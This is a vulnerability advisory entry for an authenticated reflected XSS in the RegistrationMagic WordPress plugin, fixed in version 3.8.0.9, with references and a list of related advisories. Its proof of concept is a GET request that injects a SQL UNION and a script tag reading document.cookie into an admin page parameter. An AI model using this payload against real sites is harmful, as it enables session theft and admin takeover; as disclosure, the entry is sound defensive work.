RegistrationMagic – Custom Registration Forms < 3.8.0.9 – Authenticated Reflected XSS | Plugin Vulnerabilities

Description

The RegistrationMagic – Custom Registration Forms and User Login WordPress plugin was affected by a Custom Registration Forms <= 3.8.0.4 - Authenticated Reflected XSS security vulnerability.

Proof of Concept

GET /wp-admin/admin.php?page=rm_field_manage&rm_form_id=-1+union+select+1%2C2%2C3%2C%27%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%27%2Cconcat(0x54%2C0x65%2C0x78%2C0x74%2C0x62%2C0x6f%2C0x78)%2C6%2C7%2C8%2C9%2C10%2C11

Affects Plugins

custom-registration-form-builder-with-submission-manager

Fixed in 3.8.0.9

References

URL

https://rastating.github.io/registrationmagic-custom-registration-forms-3-7-9-2-reflected-xss

URL

https://github.com/rastating/wordpress-exploit-framework/blob/422e87dd596e1f3143c1f87df9ce040c0680a76f/lib/wpxf/modules/exploit/xss/reflected/registrationmagic_reflected_xss_shell_upload.rb

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Submitter

rastating

Submitter website

https://www.rastating.com/

Submitter twitter

Verified

No

WPVDB ID

ca78b287-7371-4bbd-88b8-6b91ed786b2e

Timeline

Publicly Published

2017-12-10 (about 8 years ago)

Added

2017-12-11 (about 8 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2021-02-14

Title

Zebra_Form Library <= 2.9.8 - Reflected Cross-Site Scripting (XSS)

Published

2026-02-06

Title

OMIGO <= 3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Published

2025-03-20

Title

Feedify – Web Push Notifications < 2.4.6 - Reflected XSS

Published

2023-04-17

Title

Sloth Logo Customizer <= 2.0.2 - Stored XSS via CSRF

Published

2015-11-10

Title

Types < 1.8.8 - Cross-Site Scripting (XSS)